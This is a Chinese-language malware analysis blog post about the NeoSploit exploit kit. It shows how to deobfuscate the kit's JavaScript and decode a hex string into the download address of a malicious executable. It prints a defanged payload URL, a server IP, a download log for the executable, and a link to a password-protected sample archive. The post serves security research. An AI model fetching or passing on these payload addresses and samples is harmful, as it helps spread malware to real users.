第一问 NeoSploit是毛?
(下段摘自  http://dxp2532.blogspot.com/2007/12/neosploit-exploit-toolkit.html)

The Neosploit toolkit is an advanced exploit framework to compromise web site visitors. It was written by "grabarz". It is unknown if this is a group or an individual. There's some information which suggests it is an individual.

(NeoSploit工具箱是一个用来骚扰网民的高级的漏洞代码构建框架程序。它由grabarz编写。目前不知道是群体还是个人在作案。当然一些迹象表明它是个人。)

本文来自www.sacour.cn 转载注明来源

第二问 NeoSploit代码有多乱?
总之逼着你看的话你会有种把电脑砸掉的感觉吧,应该是的。

截图:

代码见附件(sample.zip\\1.txt)

第三问 怎么快速解密?
1.txt: Redoce 解密6,

出现提示:
 

确认

×

代码中没有发现eval字样,仍然要继续?

(Y)

(N)

选择“是”,得到如下结果,代码见附件(sample.zip\\1-2.txt):
 

可以看到是使用appendChild方法(http://www.w3school.com.cn/xmldom/met_node_appendchild.asp)试图增加一个新段,在这里面appendChild方法和使用SCRIPT SRC方法加载文件的效果类似。

向上查找n6_4B3bQ的值(熟练的话可以知道他的值就是20×,×=1~9,不影响下一步结果),这儿倒到上面的代码可以看到

DqqG_QXK8xB04K = "08";var n6_4B3bQ = "2" + DqqG_QXK8xB04K;

所以n6_4B3bQ的值是208。也就是下一步将要到hxxp://testednewpartner.com/nte/nov1.asp/wHf2f48096V0100f060006R5492dd4f102Tbeb9e9ba208。

同种脚本(sample.zip\\2.txt),继续使用之前的方法,解密6-“是”,得到(sample.zip\\2-2.txt):

注意这儿已经是明文了,如果要exe地址这儿就能抓到了,不过还是来看看代码组成:


 new Array("u","687474703A2F2F7465737465646E6577706172746E65722E636F6D2F6E74652F6E6
F76312E6173702F79483737333761626465563031303066303630303036523534393264643466313
032546265623965646562323038333033","c", "1","d", "0")


如果你要快速获取exe地址的话这儿是突破口,先把中间这一大堆数字解开了(注意把换行符去掉啊,这儿代码长了我换行的)

是这个:hxxp://testednewpartner.com/nte/nov1.asp/yH7737abdeV0100f060006R5492dd4f102Tbeb9edeb208303

不过别着急下载,还要把后面c1d0补上去,也就是hxxp://testednewpartner.com/nte/nov1.asp/yH7737abdeV0100f060006R5492dd4f102Tbeb9edeb208303c1d0才是最终的下载地址。


====INFO:====

●项目 1 准备开始...
●尝试连接69.174.242.21
●MIME:application/x-msdownload
●文件大小:145千字节 (148495 bytes)
●开始下载..hxxp://testednewpartner.com/nte/nov1.asp/yH7737abdeV0100f060006R5492dd4f102Tbeb9edeb208303c1d0
●下载结束:145千字节,下载并保存到:C:\Test\Decoder\Download\yH7737abdeV0100f060006R5492dd4f102Tbeb9edeb208303c1d0
●下载结束
====完成===

至于其他几个,分析方法和普通的差不多,稍微动动手就能解出来了。

附上代码,解压密码infected,仅供安全研究人员用

 Download link : 201007261958238754.zip